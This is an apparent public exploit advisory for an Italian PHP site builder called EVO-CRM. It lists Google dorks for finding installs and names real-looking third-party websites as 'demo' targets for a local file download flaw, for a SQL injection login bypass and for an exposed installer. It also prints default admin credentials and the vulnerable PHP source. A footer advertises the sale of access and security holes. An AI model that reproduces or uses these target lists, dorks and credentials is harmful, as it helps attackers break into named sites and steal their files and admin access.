/***********************************************************************************
** Exploit Title: EVO-CRM Script Multi Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : http://www.operagrafica.it/
**
** Version: 1.02
**
** Google Dork 1 : intext:"Sito web realizzato da OperaGrafica"
**
** Google Dork 2 : inurl:"contatti.htm" intext:"Dopo aver preso visione"
**
** Date: 2020-03-13
**
** Tested on: Windows/ Mozilla Firefox
**
***********************************************************************************
** Demo Vulnerability LFD :
https://www.tvmoving.it//download.php?nome_file=download.php
http://www.lacollinadelgirasole.it/download.php?nome_file=download.php
http://cafinv.eu/download.php?nome_file=download.php
https://www.frasipercaso.it/download.php?nome_file=download.php
https://www.logistics4you.express/download.php?nome_file=download.php
https://www.scattolini.it/download.php?nome_file=download.php
http://aestetika.it/download.php?nome_file=download.php
http://www.lacollinadelgirasole.it/download.php?nome_file=download.php
***********************************************************************************
***********************************************************************************
** Vulnerability Code Local File Download :
<?php
$nome_file = $_GET['nome_file'];
$dimensione_file = filesize($nome_file);
header("Content-type: Application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($nome_file));
header("Content-Description: Download PHP");
header("Content-Length: $dimensione_file");
readfile($nome_file);
?>
***********************************************************************************
** Demo Vulnerability Bypass Login Page With Method Post To Sql Injection :
https://www.tvmoving.it//riservato/index.php
http://www.lacollinadelgirasole.it/riservato/index.php
http://cafinv.eu/riservato/index.php
https://www.frasipercaso.it/riservato/index.php
https://www.logistics4you.express/riservato/index.php
https://www.scattolini.it/riservato/index.php
http://aestetika.it/riservato/index.php
http://www.lacollinadelgirasole.it/riservato/index.php
***********************************************************************************
***********************************************************************************
** Vulnerability Code Sql Injection :
<?php
define('ACCESS', 'public');
define('RELATIVE_PATH', "../");
require_once(RELATIVE_PATH.'include/application_top.php');
?>
<!DOCTYPE html>
<html lang="en">
<head>
<?php include_once("header_top.php");?>
</head>
<body>
<div id="caricamento" style="height:100%; top:0px;"></div>
<div class="container-fluid">
<div class="row-fluid">
<div class="row-fluid">
<div class="span12 center">
<img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" />
<h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center login-box">
<div class="alert alert-info">
Inserite un utente con credenziali valide per accedere al pannello di amministrazione.
</div>
<form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post">
<fieldset>
<div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input">
<span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" />
</div>
<div class="clearfix"></div>
<div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input">
<span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" />
</div>
<div class="clearfix"></div>
<!-- <div class="input-prepend">
<label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label>
</div>
<div class="clearfix"></div> -->
<input name="loginsubmit" type="hidden" value="Invia" />
<p class="center span5">
<button type="submit" class="btn btn-primary">Login</button>
</p>
</fieldset>
</form>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center">
<p>Password dimenticata? </p>
<a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a>
</div><!--/span-->
</div><!--/row-->
</div><!--/fluid-row-->
<div class="row-fluid">
<div class="span5 center">
<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>
</div><!--/span-->
</div><!--/row-->
</div><!--/.fluid-container-->
<?php include_once("footer_js.php");?>
</body>
</html>
***********************************************************************************
** Demo Vulnerability Default Password :
http://www.lemstrumenti.it/include/install/index.php
https://www.e-volving.it/include/install/index.php
http://www.autmarconi.it/include/install/index.php
Information : Username: admin Password: nimda
***********************************************************************************
** Special thanks to: Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com
***********************************************************************************